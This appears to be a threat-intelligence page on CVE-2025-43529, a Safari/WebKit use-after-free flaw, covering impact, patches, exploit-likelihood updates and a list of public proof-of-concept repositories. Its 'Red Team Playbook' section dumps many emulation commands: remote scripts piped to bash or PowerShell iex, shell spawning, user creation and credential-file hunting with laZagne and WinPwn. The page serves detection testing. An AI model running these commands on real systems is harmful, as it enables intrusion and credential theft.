CVE-2025-43529
Overview
This vulnerability is a use-after-free flaw arising from improper memory management within the Apple Safari web content processing engine. Specifically, the issue occurs when handling certain crafted web content, leading to the premature release of memory objects that are subsequently accessed. The affected components include Safari browser and WebKit-based rendering on multiple Apple operating systems such as iOS, iPadOS, macOS, tvOS, visionOS, and watchOS.
Vulnerability Description
A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26. CVE-2025-14174 was also issued in response to this report.
Impact
An attacker can execute arbitrary code within the context of the Safari browser by convincing a user to visit a maliciously crafted web page, requiring no prior authentication. This enables remote code execution leading to potential data compromise, persistent system control, or further lateral movement within the affected device. The low CVSS score reflects limited attack complexity but does not negate the possibility of targeted sophisticated attacks against specific individuals.
Solution
Apple has released security updates addressing this use-after-free vulnerability in Safari 26.2 and corresponding OS versions including iOS 18.7.3 and 26.2, iPadOS 18.7.3 and 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, and watchOS 26.2. Detailed patch information and update instructions are available through Apple’s official security advisories at https://support.apple.com/en-us/125884, https://support.apple.com/en-us/125885, and https://support.apple.com/en-us/125886. Users and administrators should apply these updates promptly to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is characterized as a use-after-free issue, which is a critical memory management flaw that can lead to arbitrary code execution. This type of vulnerability occurs when a program continues to use a pointer after the memory it points to has been freed. In the context of affected Apple products, such as Safari, iOS, iPadOS, macOS, tvOS, visionOS, and watchOS, this flaw arises from improper handling of memory, allowing maliciously crafted web content to exploit the flaw. The implications of this vulnerability are significant, as it can enable an attacker to execute arbitrary code on the affected device, potentially gaining unauthorized access to sensitive information or control over the device itself.
Attack vectors for this vulnerability primarily involve the exploitation of web browsers, particularly Safari, where users may encounter malicious web content. An attacker could craft a web page designed to trigger the use-after-free condition, leading to the execution of arbitrary code when the page is rendered. This exploitation could be particularly effective against targeted individuals, as evidenced by reports of sophisticated attacks leveraging this vulnerability. Users of affected devices who visit compromised websites or interact with malicious links could unwittingly become victims, allowing attackers to execute code that could compromise their personal data or device integrity.
The real-world impact of this vulnerability is substantial, especially for businesses that rely on Apple products for their operations. The potential for arbitrary code execution poses a significant risk to data confidentiality, integrity, and availability. In a corporate environment, the exploitation of this vulnerability could lead to data breaches, loss of intellectual property, and damage to the organization’s reputation. Furthermore, the existence of targeted attacks against specific individuals suggests that high-profile users, such as executives or key personnel, may be at greater risk, amplifying the potential consequences for businesses that fail to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize timely updates and patch management. Apple has released updates across its product lines to address this issue, and users are strongly encouraged to apply these updates immediately. Regularly monitoring and auditing systems for compliance with the latest security patches can significantly reduce the risk of exploitation. Additionally, implementing robust security practices, such as web filtering and user education on safe browsing habits, can further mitigate the risk of encountering malicious content. Employing intrusion detection systems may also help identify and respond to suspicious activities indicative of exploitation attempts.
In conclusion, the use-after-free vulnerability affecting various Apple products represents a serious threat to both individual users and organizations. The potential for arbitrary code execution through malicious web content highlights the importance of vigilant security practices, timely software updates, and user awareness. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, stakeholders can better prepare to defend against potential exploits and safeguard their digital environments.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-43529, rising by approximately 40% to 0.0018. This uptick, coupled with a steady upward trend over the past week, signals growing interest and potential exploitation attempts in the wild. Concurrently, new proof-of-concept exploits and detailed technical analyses have surfaced on public repositories, enhancing adversaries’ ability to weaponize this use-after-free vulnerability in Apple Safari and related platforms. While the overall exploit activity remains below a critical threshold, the combination of increased EPSS and the availability of exploit code lowers the barrier for threat actors to conduct targeted attacks, especially against high-value individuals. This development elevates the threat level from moderate to heightened vigilance, underscoring the need for defenders to monitor for exploitation attempts closely and prioritize relevant patching efforts.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-43529, accompanied by a substantial surge in the Exploit Prediction Scoring System (EPSS) score. This increase correlates with the emergence of new proof-of-concept exploits publicly available on multiple platforms, which demonstrate advanced capabilities including kernel-level read/write access and complex exploit chaining with related vulnerabilities. Our telemetry indicates that adversaries are rapidly adopting these tools, lowering the technical barrier to weaponize this use-after-free flaw in Apple Safari and associated operating systems. This shift significantly broadens the exploit landscape, suggesting a transition from isolated, highly targeted attacks to a more widespread threat environment. Consequently, the risk level has escalated from moderate to high, reflecting both the increased likelihood of exploitation and the potential impact on high-value targets. Defenders should recognize this evolving threat posture as indicative of growing adversary interest and capability, warranting heightened monitoring and prioritization of patch deployment.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Tvos | All |
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
|
|
|
Apple | Visionos | All |
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
|
|
|
Apple | Watchos | All |
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (11)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zeroxjf/WebKit-UAF-ANGLE-OOB-Analysis
Analysis of CVE-2025-43529 (WebKit UAF) + CVE-2025-14174 (ANGLE OOB) exploit chain - iOS Safari
|
zeroxjf | 100 | 21 | 2026-01-13 | View |
|
jir4vv1t/CVE-2025-43529
exploit for cve-2025-43529
|
jir4vv1t | 81 | 10 | 2026-01-05 | View |
|
GenericCoding/pois0nSword
A demonstration of read write using cve-2025-43529 on iOS 26.1
|
GenericCoding | 44 | 9 | 2026-06-11 | View |
|
bjrjk/CVE-2025-43529
Root Cause Analysis for CVE-2025-43529, a UAF vulnerability due to incorrect DFG StoreBarrierInsertionPhase in JavaScrip...
|
bjrjk | 17 | 1 | 2026-02-01 | View |
|
GenericCoding/cve-2025-43529-arbitrary-ref
A demonstration of kernel read write using cve-2025-43529
|
GenericCoding | 3 | 2 | 2026-06-11 | View |
|
SimoesCTT/CTT-Apple-Silicon-Refraction
webkit_refraction.js (The 33-Layer WebGL Payload) This JavaScript payload uses the \alpha constant to create a high-fre...
|
SimoesCTT | 1 | 1 | 2026-01-30 | View |
|
kmeps4/bugtest
CVE-2025-43529 Test
|
kmeps4 | 1 | 1 | 2026-03-02 | View |
|
SgtBattenHA/Analysis
Analysis of CVE-2025-43529 (WebKit UAF) + CVE-2025-14174 (ANGLE OOB) exploit chain - iOS Safari
|
SgtBattenHA | 2 | 0 | 2026-01-20 | View |
|
SimoesCTT/Convergent-Time-Theory-Enhanced-iOS-Safari-RCE-CVE-2025-43529-
CTT-Enhanced iOS Safari Exploit (based on CVE-2025-43529)
|
SimoesCTT | 1 | 0 | 2026-01-28 | View |
|
junfuture1103/CVE-2025-43529-no-forked
CVE-2025-43529 safari fakeobj
|
junfuture1103 | 0 | 0 | 2026-06-09 | View |
|
sakyu7/sakyu7.github.io
🔍 Analyze WebKit and ANGLE vulnerabilities with this repository for CVE-2025-43529 and CVE-2025-14174, focusing on verif...
|
sakyu7 | 0 | 0 | 2026-01-26 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-43529 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125884 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125885 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125886 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125889 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125890 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125891 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/125892 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-43529 |